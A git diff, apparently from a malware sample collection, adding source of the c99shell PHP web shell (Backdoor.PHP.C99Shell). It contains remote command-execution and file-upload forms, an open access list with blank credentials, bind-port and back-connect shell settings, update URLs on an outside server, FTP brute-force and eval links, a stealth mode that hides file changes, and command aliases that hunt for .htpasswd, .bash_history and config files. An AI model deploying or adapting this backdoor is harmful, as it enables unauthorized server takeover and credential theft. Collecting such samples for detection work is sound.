+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +if ($act == "about") {echo "
    Credits:
    Idea, leading and coding by tristram[CCTeaM].
    Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
    Thanks all who report bugs.
    All bugs send to tristram's ICQ #656555 .
    ";} +?> +
    + +

    :: Command execute ::

    Enter:
     
    Select:
     
    +
    + + + + + +
    :: Search ::
      - regexp 

    :: Upload ::
     
    +
    :: Make Dir ::
     
    :: Make File ::
     
    +
    :: Go Dir ::
     
    :: Go File ::
     
    +

    --[ c99shell v. powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: ]--

    + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.ad b/PHP/Backdoor.PHP.C99Shell.ad new file mode 100644 index 00000000..11d4535a --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.ad @@ -0,0 +1,3076 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 "; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "
    milw0rm Shell v.".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
    Owned by kangkung
    "; + /* If you publish free shell and you wish + add link to your site or any other information, + put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: + 0 - files and folders (as default), + 1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Tools",$surl."act=tools&d=%d"), + array("Proc.",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Update",$surl."act=update&d=%d"), + array("Feedback",$surl."act=feedback&d=%d"), + array("Self remove",$surl."act=selfremove"), + array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = 